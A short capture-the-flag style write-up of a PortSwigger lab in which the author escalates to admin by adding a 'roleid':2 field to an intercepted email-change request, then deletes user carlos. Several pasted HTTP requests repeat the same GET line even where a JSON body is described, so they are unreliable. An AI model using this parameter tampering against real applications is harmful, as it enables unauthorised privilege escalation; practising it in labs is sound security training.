portswigger labs: User role controlled by request parameter

بسم الله الرحمن الرحيم

first I am sorry about my bad English but I will try to improve my language in the next write up

إن شاء الله

when I log in to the labs of course after reading the description which was the next :

“This lab has an admin panel at /admin. It’s only accessible to logged-in users with a roleid of

To Solve the lab by accessing the admin panel and using it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter”

1- I login into my account using the credentials winner peter I notice that the request contain an id parameter so I try to change it to =2 and try to open the admin panel but the attempt failed

GET /admin? roleid =2 HTTP/1.1

Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k

Upgrade-Insecure-Requests: 1

2- I try to add write “roleid” instead of id but isn’t work :

GET /admin? roleid =2 HTTP/1.1

Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k

Upgrade-Insecure-Requests: 1

this message e appeared to me:

3-i open my account page and change my Gmail to “”test@gmail.com” and intercept the requests by burp suite add the new parameter to the JSON body “”roleid”:2" :

GET /admin? roleid =2 HTTP/1.1

Host: ac611f951ff0dc2080e05ddc008a00ba.web-security-academy.net

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: session=R6ZEEFPjue58AQ5K48Tn4owTF6jJp36k

Upgrade-Insecure-Requests: 1

{“email”:”test@gmail.com”, "roleid":2}

and response was the next:

HTTP/1.1 302 Found

Location: /my-account

Content-Type: application/json; charset=utf-8

Connection: close

Content-Length: 118

{

“username”: “wiener”,

“email”: “test@gmail.com”,

“apikey”: “GcZo7KbMeVFejMnxJ3i5zAPHI7pObq13”,

“roleid”: 2

}

so I opened the admin page delete carols user and the lab is solved:

think you for your reading and i hope you are benefited